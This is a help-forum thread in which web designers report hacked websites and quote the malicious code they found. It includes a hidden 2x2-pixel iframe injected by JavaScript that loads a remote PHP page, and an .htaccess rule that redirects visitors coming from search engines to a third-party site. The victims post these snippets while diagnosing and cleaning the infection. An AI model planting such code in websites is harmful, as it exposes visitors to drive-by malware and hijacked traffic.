Firefox goes to viral sites before loading my home page. I am getting scripts from these downloading onto my websites.

Firefox seems to be scanning two websites prior to loading my homepage. These appear at the bottom left hand side of the screen as Firefox is loading. They are not always the same, but they load script onto my websites somehow. Today they are yiajwe.tk and rec-creations.com (as below). Please help - these are infecting my websites - I am a web designer.

you'd have to find out if this malicious code is embedded on your website (is it also happening on other pcs?) or if your pc itself got infected with malware...

I have had a similar problem today, which hosting company do you use?

This is the source code which was found in my source code of my website: <script type="text/javascript">document.write('<iframe src="http://rec-creations.com/adv.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');</script> & almost infiltrated my computer with something.

You will have this in your .htaccess file in the root directory of the website... I had it in more than one of my sites. You can see the rec_creation site at the bottom of the list.

Whether it came from the host server, or my pc I don't know. But when I deleted this from all the .htaccess files it stopped Firefox doing it, now it goes straight to the homepage.. I did have a major crash two weeks ago and that's when this started so maybe it was my pc. Good luck.

yep, I just found a .htaccess file containing the following code:

<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://ineed.co.nz/adverts/media.php [R=301,L] </IfModule>

I have deleted it.

I also had dodgy code in one of my main .html pages & also found 2 seperate dodgy .php files in my web directory. I only discovered this by chance yesterday after browsing through my website & discovered one of my main pages was loading blank, there was a tiny 2x2 pixel size dot in the corner of the page which was a dodgy element of some sort. I'm really annoyed by this. I want to know why my website is a target, or is this a common attack???
